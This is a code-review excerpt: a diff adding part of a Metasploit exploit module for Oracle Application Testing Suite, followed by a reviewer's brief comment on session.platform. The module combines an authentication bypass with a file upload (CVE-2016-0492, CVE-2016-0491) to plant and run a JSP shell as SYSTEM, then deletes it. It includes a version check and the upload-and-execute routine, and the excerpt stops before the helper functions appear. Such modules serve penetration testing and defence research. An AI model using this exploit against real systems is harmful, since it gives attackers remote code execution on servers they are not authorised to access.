modules/exploits/multi/http/oracle_ats_file_upload.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle Application Testing Suite RCE',
+      'Description'    => %q{
+        This module exploits an authentication bypass and arbitrary file upload
+        in Oracle Application Testing Suite (OATS), versions 12.4.0.2.0 and
+        unknown earlier versions, to execute a JSP shell as the SYSTEM account.
+      },
+      'Author'         => [
+        'Zhou Yu', # Proof of concept
+        'wvu'      # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2016-0492'], # Auth bypass
+        ['CVE', '2016-0491'], # File upload
+        ['EDB', '39691']      # PoC
+      ],
+      'DisclosureDate' => 'Jan 20 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'win',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => true,
+      'Targets'        => [
+        ['OATS <= 12.4.0.2.0', {}]
+      ],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8088)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/admin/Login.do'
+    )
+
+    if res && res.body.include?('12.4.0.2.0')
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Uploading JSP shell: #{jsp_path}")
+    upload_jsp_shell
+    print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
+    exec_jsp_shell
+  end
+
+  # XXX: This is a hack because session.platform is a lie
+  def on_new_session(session)
+    super
+    print_status("Deleting JSP shell: #{jsp_path}")
+    session.shell_command_token("del /f /q #{jsp_path}")
```

Comment:
Actually, I just saw the comment. Never mind. So I guess your session.platform is returning ```java``` or something like that, right?